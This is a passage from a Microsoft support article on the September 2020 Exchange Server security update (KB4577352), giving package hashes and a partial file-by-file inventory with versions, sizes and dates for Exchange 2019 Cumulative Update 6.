information about this update, see [security update deployment information: September 8, 2020](<https://support.microsoft.com/help/20200908>). \n\n### Security update replacement information\n\nThis security update replaces the following previously released updates:\n\n * Description of the security update for Microsoft Exchange Server 2019 and 2016: March 10, 2020\n\n## File information\n\n### File hash information\n\nUpdate name| File name| SHA1 hash| SHA256 hash \n---|---|---|--- \nExchange Server 2019 Cumulative Update 6| Exchange2019-KB4577352-x64-en.msp| 5B3B0B62C5E569DD5933C7BA9B1CCC6DB4E345BA| 505D471F51C9FCAB7DAB05B5BC1AFD90F29B3C5E220B0BD8C4B2294DC73FB2FA \nExchange Server 2019 Cumulative Update 5| Exchange2019-KB4577352-x64-en.msp| BB2831C140538F45CBAC9F819ECBD95A1B07DDAC| 5D9DAAF411F0C5DEA72BBD238DACC3852D90EDCAAA4CBA1D909C93ED061EC122 \nExchange Server 2016 Cumulative Update 17| Exchange2016-KB4577352-x64-en.msp| CE5F53FDE5F3DFE491B80CE27FEA735EBAA929BC| 176F74049CC7B9087A7C6190DBD85EC0A1B269FC8EE4F646CF17710B5E97924C \nExchange Server 2016 Cumulative Update 16| Exchange2016-KB4577352-x64-en.msp| F6227A7AE5DFDDBE27E8F3C6BB3AD5D3907FCF52| 851E0361A4300E44A3F01E20E125191CC1728FE30EA3298B9FA1E3D49AF89000 \n \nExchange server file informationThe English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nExchange Server 2019 Cumulative Update 6\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.2.659.6| 71,040| 12-Aug-2020| 21:25| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,522| 12-Aug-2020| 21:25| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,929| 12-Aug-2020| 21:26| Not applicable \nAdemodule.dll| 15.2.659.6| 106,376| 12-Aug-2020| 21:26| x64 \nAirfilter.dll| 15.2.659.6| 42,888| 12-Aug-2020| 21:25| x64 \nAjaxcontroltoolkit.dll| 15.2.659.6| 92,544| 12-Aug-2020| 21:25| x86 \nAntispamcommon.ps1| Not applicable| 13,505| 12-Aug-2020| 21:26| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 12-Aug-2020| 21:25| Not applicable \nAsentirs.msi| Not applicable| 77,824| 12-Aug-2020| 21:27| Not applicable \nAsentsig.msi| Not applicable| 73,728| 12-Aug-2020| 21:27| Not applicable \nBigfunnel.bondtypes.dll| 15.2.659.6| 45,448| 12-Aug-2020| 21:26| x86 \nBigfunnel.common.dll| 15.2.659.6| 66,424| 12-Aug-2020| 21:25| x86 \nBigfunnel.configuration.dll| 15.2.659.6| 118,144| 12-Aug-2020| 21:25| x86 \nBigfunnel.entropy.dll| 15.2.659.6| 44,424| 12-Aug-2020| 21:25| x86 \nBigfunnel.filter.dll| 15.2.659.6| 54,152| 12-Aug-2020| 21:25| x86 \nBigfunnel.indexstream.dll| 15.2.659.6| 68,984| 12-Aug-2020| 21:26| x86 \nBigfunnel.neuraltree.dll| Not applicable| 694,144| 12-Aug-2020| 21:25| x64 \nBigfunnel.neuraltreeranking.dll| 15.2.659.6| 19,840| 12-Aug-2020| 21:25| x86 \nBigfunnel.poi.dll| 15.2.659.6| 245,128| 12-Aug-2020| 21:25| x86 \nBigfunnel.postinglist.dll| 15.2.659.6| 189,320| 12-Aug-2020| 21:26| x86 \nBigfunnel.query.dll| 15.2.659.6| 101,248| 12-Aug-2020| 21:25| x86 \nBigfunnel.ranking.dll| 15.2.659.6| 109,440| 12-Aug-2020| 21:25| x86 \nBigfunnel.syntheticdatalib.dll| 15.2.659.6| 3,634,560| 12-Aug-2020| 21:25| x86 \nBigfunnel.tracing.dll| 15.2.659.6| 42,888| 12-Aug-2020| 21:25| x86 \nBigfunnel.wordbreakers.dll| 15.2.659.6| 46,472| 12-Aug-2020| 21:25| x86 \nCafe_airfilter_dll| 15.2.659.6| 42,888| 12-Aug-2020| 21:25| x64 \nCafe_exppw_dll| 15.2.659.6| 83,336| 12-Aug-2020| 21:25| x64 \nCafe_owaauth_dll| 15.2.659.6| 92,032| 12-Aug-2020| 21:25| x64 \nCalcalculation.ps1| Not applicable| 42,097| 12-Aug-2020| 21:27| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,622| 12-Aug-2020| 21:25| Not applicable \nChksgfiles.dll| 15.2.659.6| 57,224| 12-Aug-2020| 21:26| x64 \nCitsconstants.ps1| Not applicable| 15,805| 12-Aug-2020| 21:26| Not applicable \nCitslibrary.ps1| Not applicable| 82,664| 12-Aug-2020| 21:26| Not applicable \nCitstypes.ps1| Not applicable| 14,464| 12-Aug-2020| 21:26| Not applicable \nClassificationengine_mce| 15.2.659.6| 1,693,576| 12-Aug-2020| 21:25| Not applicable \nClusmsg.dll| 15.2.659.6| 134,016| 12-Aug-2020| 21:27| x64 \nCoconet.dll| 15.2.659.6| 48,008| 12-Aug-2020| 21:26| x64 \nCollectovermetrics.ps1| Not applicable| 81,644| 12-Aug-2020| 21:25| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,886| 12-Aug-2020| 21:25| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,931| 12-Aug-2020| 21:25| Not applicable \nComplianceauditservice.exe| 15.2.659.6| 39,808| 12-Aug-2020| 21:25| x86 \nConfigureadam.ps1| Not applicable| 22,764| 12-Aug-2020| 21:26| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,308| 12-Aug-2020| 21:26| Not applicable \nConfigurecryptodefaults.ps1| Not applicable| 42,039| 12-Aug-2020| 21:27| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,770| 12-Aug-2020| 21:27| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,828| 12-Aug-2020| 21:26| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,283| 12-Aug-2020| 21:27| Not applicable \nConnectfunctions.ps1| Not applicable| 37,125| 12-Aug-2020| 21:25| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 29,620| 12-Aug-2020| 21:25| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,232| 12-Aug-2020| 21:26| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,053| 12-Aug-2020| 21:27| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,532| 12-Aug-2020| 21:26| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,765| 12-Aug-2020| 21:26| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,912| 12-Aug-2020| 21:27| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 18:15| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 18:15| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 18:15| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 18:15| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 18:15| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 18:15| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 18:15| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 18:15| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 18:15| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 18:15| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 18:15| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 18:15| Not applicable \nCts_exsmime.dll| 15.2.659.6| 380,808| 12-Aug-2020| 21:26| x64 \nCts_microsoft.exchange.data.common.dll| 15.2.659.6| 1,686,408| 12-Aug-2020| 21:26| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 499| 12-Aug-2020| 18:15| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.2.659.6| 12,672| 12-Aug-2020| 21:25| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.2.659.6| 12,672| 12-Aug-2020| 21:25| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.2.659.6| 12,672| 12-Aug-2020| 21:25| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.2.659.6| 12,680| 12-Aug-2020| 21:25| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.2.659.6| 12,680| 12-Aug-2020| 21:27| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.2.659.6| 12,672| 12-Aug-2020| 21:25| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.2.659.6| 12,672| 12-Aug-2020| 21:25| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.2.659.6| 12,672| 12-Aug-2020| 21:25| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.2.659.6| 12,680| 12-Aug-2020| 21:25| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.2.659.6| 12,680| 12-Aug-2020| 21:25| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.2.659.6| 12,680| 12-Aug-2020| 21:25| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.2.659.6| 12,672| 12-Aug-2020| 21:25| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.2.659.6| 12,672| 12-Aug-2020| 21:25| x86 \nDagcommonlibrary.ps1| Not applicable| 60,242| 12-Aug-2020| 21:25| Not applicable \nDependentassemblygenerator.exe| 15.2.659.6| 22,400| 12-Aug-2020| 21:27| x86 \nDiaghelper.dll| 15.2.659.6| 66,944| 12-Aug-2020| 21:26| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,334| 12-Aug-2020| 21:27| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,362| 12-Aug-2020| 21:26| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,189| 12-Aug-2020| 21:26| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,654| 12-Aug-2020| 21:26| Not applicable \nDisklockerapi.dll| Not applicable| 22,400| 12-Aug-2020| 21:25| x64 \nDlmigrationmodule.psm1| Not applicable| 39,580| 12-Aug-2020| 21:26| Not applicable \nDsaccessperf.dll| 15.2.659.6| 45,952| 12-Aug-2020| 21:25| x64 \nDscperf.dll| 15.2.659.6| 32,648| 12-Aug-2020| 21:26| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.2.659.6| 1,686,408| 12-Aug-2020| 21:26| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.2.659.6| 601,472| 12-Aug-2020| 21:25| x86 \nEcpperfcounters.xml| Not applicable| 30,352| 12-Aug-2020| 21:26| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:15| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.2.659.6| 12,672| 12-Aug-2020| 21:25| x86 \nEdgetransport.exe| 15.2.659.6| 49,536| 12-Aug-2020| 21:26| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:15| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:15| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:15| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:15| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:15| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:15| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:15| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:15| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:15| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:15| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:15| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 502| 12-Aug-2020| 18:15| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.2.659.6| 12,680| 12-Aug-2020| 21:25| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.2.659.6| 12,680| 12-Aug-2020| 21:25| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.2.659.6| 12,680| 12-Aug-2020| 21:25| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.2.659.6| 12,672| 12-Aug-2020| 21:26| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.2.659.6| 12,672| 12-Aug-2020| 21:25| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.2.659.6| 12,680| 12-Aug-2020| 21:26| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.2.659.6| 12,672| 12-Aug-2020| 21:25| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.2.659.6| 12,672| 12-Aug-2020| 21:26| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.2.659.6| 13,184| 12-Aug-2020| 21:26| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.2.659.6| 12,672| 12-Aug-2020| 21:26| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.2.659.6| 12,680| 12-Aug-2020| 21:25| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.2.659.6| 12,672| 12-Aug-2020| 21:27| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,364| 12-Aug-2020| 21:26| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,563| 12-Aug-2020| 21:26| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,588| 12-Aug-2020| 21:26| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,598| 12-Aug-2020| 21:26| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,916| 12-Aug-2020| 21:26| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,647| 12-Aug-2020| 21:26| Not applicable \nEngineupdateserviceinterfaces.dll| 15.2.659.6| 17,800| 12-Aug-2020| 21:25| x86 \nEscprint.dll| 15.2.659.6| 20,352| 12-Aug-2020| 21:25| x64 \nEse.dll| 15.2.659.6| 3,741,568| 12-Aug-2020| 21:26| x64 \nEseback2.dll| 15.2.659.6| 350,088| 12-Aug-2020| 21:26| x64 \nEsebcli2.dll| 15.2.659.6| 318,344| 12-Aug-2020| 21:25| x64 \nEseperf.dll| 15.2.659.6| 108,936| 12-Aug-2020| 21:26| x64 \nEseutil.exe| 15.2.659.6| 425,344| 12-Aug-2020| 21:25| x64 \nEsevss.dll| 15.2.659.6| 44,416| 12-Aug-2020| 21:25| x64 \nEtweseproviderresources.dll| 15.2.659.6| 101,248| 12-Aug-2020| 21:25| x64 \nEventperf.dll| 15.2.659.6| 59,784| 12-Aug-2020| 21:25| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,093| 12-Aug-2020| 21:25| Not applicable \nExchange.format.ps1xml| Not applicable| 649,678| 12-Aug-2020| 21:25| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 44,323| 12-Aug-2020| 21:26| Not applicable \nExchange.ps1| Not applicable| 20,791| 12-Aug-2020| 21:26| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,535| 12-Aug-2020| 21:26| Not applicable \nExchange.types.ps1xml| Not applicable| 365,133| 12-Aug-2020| 21:25| Not applicable \nExchangeudfcommon.dll| 15.2.659.6| 122,760| 12-Aug-2020| 21:26| x86 \nExchangeudfs.dll| 15.2.659.6| 272,776| 12-Aug-2020| 21:25| x86 \nExchmem.dll| 15.2.659.6| 86,408| 12-Aug-2020| 21:26| x64 \nExchsetupmsg.dll| 15.2.659.6| 19,328| 12-Aug-2020| 21:27| x64 \nExdbfailureitemapi.dll| Not applicable| 27,008| 12-Aug-2020| 21:25| x64 \nExdbmsg.dll| 15.2.659.6| 230,784| 12-Aug-2020| 21:27| x64 \nExeventperfplugin.dll| 15.2.659.6| 25,472| 12-Aug-2020| 21:26| x64 \nExmime.dll| 15.2.659.6| 364,928| 12-Aug-2020| 21:25| x64 \nExportedgeconfig.ps1| Not applicable| 27,391| 12-Aug-2020| 21:26| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,558| 12-Aug-2020| 21:27| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 29,206| 12-Aug-2020| 21:26| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,394| 12-Aug-2020| 21:26| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,125| 12-Aug-2020| 21:26| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,044| 12-Aug-2020| 21:26| Not applicable \nExppw.dll| 15.2.659.6| 83,336| 12-Aug-2020| 21:25| x64 \nExprfdll.dll| 15.2.659.6| 26,504| 12-Aug-2020| 21:27| x64 \nExrpc32.dll| 15.2.659.6| 2,029,448| 12-Aug-2020| 21:25| x64 \nExrw.dll| 15.2.659.6| 28,040| 12-Aug-2020| 21:26| x64 \nExsetdata.dll| 15.2.659.6| 2,779,520| 12-Aug-2020| 21:27| x64 \nExsetup.exe| 15.2.659.6| 35,200| 12-Aug-2020| 21:25| x86 \nExsetupui.exe| 15.2.659.6| 471,936| 12-Aug-2020| 21:25| x86 \nExtrace.dll| 15.2.659.6| 245,128| 12-Aug-2020| 21:25| x64 \nExt_microsoft.exchange.data.transport.dll| 15.2.659.6| 601,472| 12-Aug-2020| 21:25| x86 \nExwatson.dll| 15.2.659.6| 44,928| 12-Aug-2020| 21:25| x64 \nFastioext.dll| 15.2.659.6| 60,296| 12-Aug-2020| 21:25| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,631| 12-Aug-2020| 21:26| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,261| 12-Aug-2020| 21:26| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,793| 12-Aug-2020| 21:26| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,404| 12-Aug-2020| 21:26| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,656| 12-Aug-2020| 21:26| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,759| 12-Aug-2020| 21:26| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,628| 12-Aug-2020| 21:26| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,604| 12-Aug-2020| 21:26| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 12-Aug-2020| 21:27| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,344| 12-Aug-2020| 21:26| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,258| 12-Aug-2020| 21:26| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,787| 12-Aug-2020| 21:26| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,596,145| 12-Aug-2020| 21:25| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,596,145| 12-Aug-2020| 21:25| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,596,145| 12-Aug-2020| 21:25| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,763| 12-Aug-2020| 21:26| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,793| 12-Aug-2020| 21:26| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,596,145| 12-Aug-2020| 21:25| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,634| 12-Aug-2020| 21:26| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,596,145| 12-Aug-2020| 21:25| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,658| 12-Aug-2020| 21:26| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,790| 12-Aug-2020| 21:26| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,634| 12-Aug-2020| 21:26| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 12-Aug-2020| 21:27| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| 342,829,683| 12-Aug-2020| 21:27| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,777| 12-Aug-2020| 21:26| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,634| 12-Aug-2020| 21:26| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,596,145| 12-Aug-2020| 21:25| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,640| 12-Aug-2020| 21:26| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 12-Aug-2020| 21:27| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,231| 12-Aug-2020| 21:26| Not applicable \nFilteringpowershell.dll| 15.2.659.6| 223,112| 12-Aug-2020| 21:25| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,652| 12-Aug-2020| 21:25| Not applicable \nFiltermodule.dll| 15.2.659.6| 180,104| 12-Aug-2020| 21:25| x64 \nFipexeuperfctrresource.dll| 15.2.659.6| 15,232| 12-Aug-2020| 21:25| x64 \nFipexeventsresource.dll| 15.2.659.6| 44,928| 12-Aug-2020| 21:26| x64 \nFipexperfctrresource.dll| 15.2.659.6| 32,632| 12-Aug-2020| 21:25| x64 \nFirewallres.dll| 15.2.659.6| 72,576| 12-Aug-2020| 21:26| x64 \nFms.exe| 15.2.659.6| 1,350,016| 12-Aug-2020| 21:26| x64 \nForefrontactivedirectoryconnector.exe| 15.2.659.6| 110,976| 12-Aug-2020| 21:25| x64 \nFpsdiag.exe| 15.2.659.6| 18,824| 12-Aug-2020| 21:26| x86 \nFsccachedfilemanagedlocal.dll| 15.2.659.6| 822,152| 12-Aug-2020| 21:26| x64 \nFscconfigsupport.dll| 15.2.659.6| 56,696| 12-Aug-2020| 21:26| x86 \nFscconfigurationserver.exe| 15.2.659.6| 430,976| 12-Aug-2020| 21:25| x64 \nFscconfigurationserverinterfaces.dll| 15.2.659.6| 15,744| 12-Aug-2020| 21:25| x86 \nFsccrypto.dll| 15.2.659.6| 208,768| 12-Aug-2020| 21:26| x64 \nFscipcinterfaceslocal.dll| 15.2.659.6| 28,544| 12-Aug-2020| 21:26| x86 \nFscipclocal.dll| 15.2.659.6| 38,280| 12-Aug-2020| 21:25| x86 \nFscsqmuploader.exe| 15.2.659.6| 453,512| 12-Aug-2020| 21:26| x64 \nGetucpool.ps1| Not applicable| 19,775| 12-Aug-2020| 21:27| Not applicable \nGetvalidengines.ps1| Not applicable| 13,274| 12-Aug-2020| 21:27| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,809| 12-Aug-2020| 21:26| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,655| 12-Aug-2020| 21:26| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,711| 12-Aug-2020| 21:26| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,759| 12-Aug-2020| 21:26| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,482| 12-Aug-2020| 21:26| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,689| 12-Aug-2020| 21:26| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,794| 12-Aug-2020| 21:26| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,336| 12-Aug-2020| 21:26| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,947| 12-Aug-2020| 21:26| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,026| 12-Aug-2020| 21:26| Not applicable \nGet_storetrace.ps1| Not applicable| 51,887| 12-Aug-2020| 21:25| Not applicable \nHuffman_xpress.dll| 15.2.659.6| 32,648| 12-Aug-2020| 21:25| x64 \nImportedgeconfig.ps1| Not applicable| 77,248| 12-Aug-2020| 21:26| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,480| 12-Aug-2020| 21:26| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,818| 12-Aug-2020| 21:26| Not applicable \nInproxy.dll| 15.2.659.6| 85,896| 12-Aug-2020| 21:26| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,523| 12-Aug-2020| 21:27| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,929| 12-Aug-2020| 21:26| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,967| 12-Aug-2020| 21:26| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.659.6| 107,400| 12-Aug-2020| 21:25| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.659.6| 20,360| 12-Aug-2020| 21:26| Not applicable \nInterop.certenroll.dll| 15.2.659.6| 142,712| 12-Aug-2020| 21:25| x86 \nInterop.licenseinfointerface.dll| 15.2.659.6| 14,216| 12-Aug-2020| 21:26| x86 \nInterop.netfw.dll| 15.2.659.6| 34,176| 12-Aug-2020| 21:25| x86 \nInterop.plalibrary.dll| 15.2.659.6| 72,576| 12-Aug-2020| 21:25| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.659.6| 27,008| 12-Aug-2020| 21:25| Not applicable \nInterop.taskscheduler.dll| 15.2.659.6| 46,472| 12-Aug-2020| 21:25| x86 \nInterop.wuapilib.dll| 15.2.659.6| 60,800| 12-Aug-2020| 21:27| x86 \nInterop.xenroll.dll| 15.2.659.6| 39,808| 12-Aug-2020| 21:25| x86 \nKerbauth.dll| 15.2.659.6| 62,848| 12-Aug-2020| 21:26| x64 \nLicenseinfointerface.dll| 15.2.659.6| 643,464| 12-Aug-2020| 21:25| x64 \nLpversioning.xml| Not applicable| 19,654| 12-Aug-2020| 21:25| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,904| 12-Aug-2020| 21:25| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.2.659.6| 138,624| 12-Aug-2020| 21:26| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 126,237| 12-Aug-2020| 21:26| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,356| 12-Aug-2020| 21:25| Not applicable \nManage_metacachedatabase.ps1| Not applicable| 51,087| 12-Aug-2020| 21:26| Not applicable \nMce.dll| 15.2.659.6| 1,693,576| 12-Aug-2020| 21:25| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,503| 12-Aug-2020| 21:25| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,623| 12-Aug-2020| 21:26| Not applicable \nMicrosoft.database.isam.dll| 15.2.659.6| 127,880| 12-Aug-2020| 21:25| x86 \nMicrosoft.dkm.proxy.dll| 15.2.659.6| 25,992| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.2.659.6| 68,488| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.2.659.6| 17,792| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.2.659.6| 233,352| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.2.659.6| 15,752| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.2.659.6| 43,384| 12-Aug-2020| 21:27| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.2.659.6| 1,776,000| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.airsync.dll1| 15.2.659.6| 505,216| 12-Aug-2020| 21:27| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.2.659.6| 76,168| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.anchorservice.dll| 15.2.659.6| 135,552| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.2.659.6| 23,432| 12-Aug-2020| 